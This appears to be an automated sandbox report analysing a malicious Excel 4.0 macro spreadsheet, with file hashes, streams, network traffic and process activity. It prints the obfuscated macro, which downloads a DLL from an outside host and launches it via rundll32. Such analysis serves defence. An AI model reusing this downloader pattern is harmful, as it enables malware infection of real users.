              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
              C:\Users\user\AppData\Local\Temp\TarF9EB.tmp
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):152788
              Entropy (8bit):6.309740459389463
              Encrypted:false
              SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
              MD5:4E0487E929ADBBA279FD752E7FB9A5C4
              SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
              SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
              SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
              Malicious:false
              Reputation:high, very likely benign file
              Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 16:51:47 2021, atime=Tue May 4 16:51:47 2021, length=8192, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.4818941569424275
              Encrypted:false
              SSDEEP:12:85QPLgXg/XAlCPCHaXgzB8IB/0PJX+WnicvbZ1ObDtZ3YilMMEpxRljKoTdJP9TK:85Y/XTwz6IWRYe11CDv3qtrNru/
              MD5:F1FF8D1C4D84BF01C8B1A86522160A11
              SHA1:F03FC7A1E39AB3B68D2F9A1BD1BA90AA3AF9FBAB
              SHA-256:F4B4471ADED4A28203266833C5B50DB1C2DF64F9AA3D129F36262DC6458374FB
              SHA-512:0D307FA2555F46887A4A77E965F0AC55622B3BA346B154E6CFC938C123EE3675A6E4B5F726608B107D79543B7062CFCBF7C60CBBDDE7B9C3BD8F19132E4ACA75
              Malicious:false
              Reputation:low
              Preview: L..................F...........7G....C'.A....C'.A... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rx...Desktop.d......QK.X.Rx.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\e1df57de_by_Libranalysis.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue May 4 16:51:26 2021, mtime=Tue May 4 16:51:47 2021, atime=Tue May 4 16:51:47 2021, length=111616, window=hide
              Category:dropped
              Size (bytes):2168
              Entropy (8bit):4.549240966530211
              Encrypted:false
              SSDEEP:48:8r/XT3I8OE+ON1OE6tQh2r/XT3I8OE+ON1OE6tQ/:8r/XLI8FfN1F6tQh2r/XLI8FfN1F6tQ/
              MD5:F9085DD595E37E817A815348289D6CDB
              SHA1:7B95DFEF0D4AB964E0C712B9209777146C850BEC
              SHA-256:DF4533ADCEFA7C413E319C56A1A70CFF8A076970F17A627E2AA5C0BCF9CBD2BE
              SHA-512:3A0A0AAA4447C304275CF8C5CABD84573A826BAFE6F35DA2E368A7B994A9BF5E5AF0E6F6DB980F2E02E100DB0B32B61E2830250C4A30AD55168896ACED4D374B
              Malicious:false
              Reputation:low
              Preview: L..................F.... ....m...A....C'.A...qO'.A...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rn...Desktop.d......QK.X.Rn.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..b...Rt. .E1DF57~1.XLS..f......Rn..Rn.*.........................e.1.d.f.5.7.d.e._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\e1df57de_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.1.d.f.5.7.d.e._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):125
              Entropy (8bit):4.7413886091115245
              Encrypted:false
              SSDEEP:3:oyBVomM6YiHUwSLMp6lYUIYiHUwSLMp6lmM6YiHUwSLMp6lv:dj6hi0NRi0Nbhi0Nf
              MD5:FA818B7E82A804136CCCDAEB0E371E4C
              SHA1:790C7E1C67EC725C24D5056180873455ACC57A4E
              SHA-256:6CAF0A49734FC7FE1DE034E925D1906442024E0C40C0BBA612217B0245B51B58
              SHA-512:7D1ACC9D7F01044F50BD4926CB5DBB27A83459CB0EFE966A73F8C1803A7AB3FD2EA347C9ABAE584DAFE1EC152E918722C2F1BD4ACD4FFC2A296EDCEE6790DE00
              Malicious:false
              Reputation:low
              Preview: Desktop.LNK=0..[xls]..e1df57de_by_Libranalysis.LNK=0..e1df57de_by_Libranalysis.LNK=0..[xls]..e1df57de_by_Libranalysis.LNK=0..
              C:\Users\user\Desktop\03FE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Applesoft BASIC program data, first line number 16
              Category:dropped
              Size (bytes):160650
              Entropy (8bit):6.660755185518192
              Encrypted:false
              SSDEEP:3072:7V8rmjAItyzElBIL6lECbgBGGP5xLm7T22nTUSyF70WieW2bjK6kbjKNV8rmjAIm:Z8rmjAItyzElBIL6lECbgBvP5Nm7TxUG
              MD5:901913EE5C0F88F90E8DB1A4E6F210BF
              SHA1:C7EE91F62B1B945DDF05EA522E4912F591AA6596
              SHA-256:3A01E49B950685FF980A1C5F9EA2F77B61102AB9858D6101189F2B59B1914492
              SHA-512:2639E2C9B8BE0A497C328108FEE4B29DE9E143180D51D5821C481C2C74B6A2956F854D23C494F09EBA6EF4843F073B62EB0AA35929A0DDBFCC57F33F39031AE2
              Malicious:false
              Reputation:low
              Preview: ........g2..........................\.p....user B.....a.........=...................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......

              Static File Info

              General

              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Apr 28 08:31:09 2021, Security: 0
              Entropy (8bit):3.26064272206503
              TrID:
              • Microsoft Excel sheet (30009/1) 78.94%
              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
              File name:e1df57de_by_Libranalysis.xls
              File size:287232
              MD5:e1df57deebdfeab450bf91049acff902
              SHA1:0037a523a17be3411b88072f7ceb3cc0ef384da7
              SHA256:b0cccc9e79029c5b0b4e835e22e783a37ded6a300ca9d1738e554b126dd0969c
              SHA512:3a2878bee800832e2eac6705d4b299b0814af28bf47dc0504a1425b87f9728f94a208222d3da907a35ce6c0cce0bce279cb765060e1fa464656bc83d4cfd9c87
              SSDEEP:6144:YcPiTQAVW/89BQnmlcGvgZ7r3J8b5ICJK+T5gE:lDE
              File Content Preview:........................>......................./...........................*...+...,...-......................................................................................................................................................................

              File Icon

              Icon Hash:e4eea286a4b4bcb4

              Static OLE Info

              General

              Document Type:OLE
              Number of OLE Files:1

              OLE File "e1df57de_by_Libranalysis.xls"

              Indicators

              Has Summary Info:True
              Application Name:Microsoft Excel
              Encrypted Document:False
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:True
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:True

              Summary

              Code Page:1251
              Last Saved By:5
              Create Time:2006-09-16 00:00:00
              Last Saved Time:2021-04-28 07:31:09
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Document Code Page:1251
              Thumbnail Scaling Desired:False
              Contains Dirty Links:False

              Streams

              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
              General
              Stream Path:\x5DocumentSummaryInformation
              File Type:data
              Stream Size:4096
              Entropy:0.344544096356
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 5 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 06 00 00 00
              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
              General
              Stream Path:\x5SummaryInformation
              File Type:data
              Stream Size:4096
              Entropy:0.239529171145
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . t . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 275392
              General
              Stream Path:Book
              File Type:Applesoft BASIC program data, first line number 8
              Stream Size:275392
              Entropy:3.23578403018
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X
              Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

              Macro 4.0 Code

              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://obsusa.net/chemgrcr.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\qqjdkdl.obp""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet2"")=WORKBOOK.HIDE(""Sheet3"")=WORKBOOK.HIDE(""Sheet4"")=WORKBOOK.HIDE(""Sheet5"")",,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,,,,,,,,,,,,,,,,,,L,,,,,CBB,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,o,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,"=LEFT(""URdndiond"",2)",,,,,,,o,,,,n,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,n,,,o,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rund,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",St",,,,,,,,,,,,,,,,,,,,"=""ll32 """,,ar,,,,,,,,,,,,,,,,,,,,,,tW,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
              =ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=EXEC(Sheet3!BN47&Sheet3!BM53&Sheet3!BU19&Sheet3!BO52&Sheet3!BO53&Sheet3!BO54)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=RUN(Sheet3!BG25)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)
              "=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=CALL(Sheet3!CA36&Sheet3!BM32&Sheet3!BL36&Sheet3!BL37&Sheet3!BM39,Sheet3!BP28&Sheet3!BP29&Sheet3!BP33&Sheet3!BO31&Sheet3!BP35&Sheet3!BO35&Sheet3!BP37&Sheet3!BN38&Sheet3!BP39&Sheet5!BM31&Sheet5!BF30,Sheet3!BQ27&Sheet3!BR32,Sheet3!BQ41,Sheet3!BU15,Sheet3!BU19,Sheet3!BR48,Sheet3!BS39)=Sheet4!BH32()&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&"""""

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 4, 2021 10:51:31.564574003 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:31.704153061 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:31.704309940 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:31.749247074 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:31.886821032 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:31.887329102 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:31.887353897 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:31.887377977 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:31.887398005 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:31.887430906 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:31.888020039 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:31.889327049 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:31.889425993 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:31.901334047 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:32.039360046 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:32.039531946 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:33.127418041 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:33.304382086 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:34.259905100 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:34.259953976 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:34.259977102 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:34.259998083 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:34.260013103 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:34.260030985 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:34.260094881 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:34.260123014 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:34.260957956 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:34.260982037 CEST49165443192.168.2.22170.249.236.47
              May 4, 2021 10:51:34.405467987 CEST44349165170.249.236.47192.168.2.22
              May 4, 2021 10:51:34.405591011 CEST49165443192.168.2.22170.249.236.47

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 4, 2021 10:51:31.369769096 CEST5219753192.168.2.228.8.8.8
              May 4, 2021 10:51:31.532382965 CEST53521978.8.8.8192.168.2.22
              May 4, 2021 10:51:32.459278107 CEST5309953192.168.2.228.8.8.8
              May 4, 2021 10:51:32.507986069 CEST53530998.8.8.8192.168.2.22
              May 4, 2021 10:51:32.516098976 CEST5283853192.168.2.228.8.8.8
              May 4, 2021 10:51:32.569176912 CEST53528388.8.8.8192.168.2.22

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              May 4, 2021 10:51:31.369769096 CEST192.168.2.228.8.8.80xccaeStandard query (0)obsusa.netA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              May 4, 2021 10:51:31.532382965 CEST8.8.8.8192.168.2.220xccaeNo error (0)obsusa.net170.249.236.47A (IP address)IN (0x0001)

              HTTPS Packets

              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
              May 4, 2021 10:51:31.889327049 CEST170.249.236.47443192.168.2.2249165CN=obsusa.net CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Apr 15 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Thu Jul 15 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
              CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:10:51:43
              Start date:04/05/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13fdf0000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:10:51:51
              Start date:04/05/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\qqjdkdl.obp,StartW
              Imagebase:0xff640000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >